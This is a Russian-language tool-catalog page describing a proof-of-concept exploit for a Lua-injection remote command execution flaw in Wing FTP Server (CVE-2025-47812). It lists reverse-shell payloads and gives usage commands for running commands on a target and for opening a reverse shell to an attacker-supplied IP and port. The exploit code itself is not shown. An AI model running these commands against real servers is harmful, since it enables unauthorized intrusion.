Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
WingFTP-CVE-2025-47812-illdeed — Эксплойт удаленного выполнения команд для Wing FTP Server (CVE-2025-47812) | Kitploit
Инструменты/GitHubGitHub/ill-deed/wingftp-cve-2025-47812-illdeed
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubill-deed/wingftp-cve-2025-47812-illdeed

WingFTP-CVE-2025-47812-illdeed

Эксплойт удаленного выполнения команд для Wing FTP Server (CVE-2025-47812)

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-47812 — Эксплойт RCE для Wing FTP Server

В этом репозитории представлен proof-of-concept эксплойт для CVE-2025-47812 — уязвимости удалённого выполнения команд (RCE) в Wing FTP Server. Злоумышленник может внедрить и выполнить произвольные Lua-команды, манипулируя параметром username при аутентификации, что приводит к полному удалённому выполнению кода.


📌 Возможности эксплойта

  • 🔧 Удалённое выполнение произвольных shell-команд
  • 🧬 Несколько встроенных reverse shell пейлоадов (bash, Python, netcat и др.)
  • 🪪 Автоматическое извлечение UID из Set-Cookie
  • 📦 Логирование успешных UID в found_uids.txt
  • 🧪 Режим "холостого прогона" (dry-run) — без реальной отправки запросов (безопасно проверяйте логику ввода/вывода)
  • 🔁 Повторные попытки при сетевых сбоях
  • 🧹 Более чистое форматирование пейлоадов и читаемый вывод
  • ✅ Проверка корректности IP-адресов, портов и URL
  • ⚙️ Поддержка аргументов командной строки для автоматизации

💻 Использование

Выполнение простой shell-команды:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"

Запуск reverse shell:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444

Режим dry-run (запросы отправляться не будут):

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run

🔄 Изменения, внесённые в оригинальный эксплойт

Особенность/УлучшениеОписание
✅ Разбор аргументовДобавлена поддержка CLI на основе argparse для неинтерактивного режима
🔐 Проверка вводаПроверка корректности URL/IP/порта перед попыткой эксплуатации
📦 Рефакторинг заголовковHTTP-заголовки вынесены в переиспользуемую функцию для единообразия
📄 Логирование UIDСохранение успешных UID-токенов в found_uids.txt
🧪 Режим Dry-RunБезопасное тестирование без отправки запросов (--dry-run)
🕒 Таймаут и повторыДобавлены таймаут запроса и автоматические повторы при сбоях
🧼 Читаемость пейлоадовПереформатирована строка Lua-инъекции для ясности и простоты поддержки
📊 Структурированный выводОтветы сервера и информация о пейлоаде обёрнуты разделителями для удобства чтения
⚠️ Проверка кодов состоянияПредупреждение, если цель возвращает неожиданные HTTP-статусы
📝 Система логированияprint() заменён на модуль logging Python для лучшего контроля подробности

⚠️ Отказ от ответственности

Данный проект предназначен только для образовательных целей и авторизованного тестирования безопасности.
Не используйте этот инструмент против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


Скачать инструмент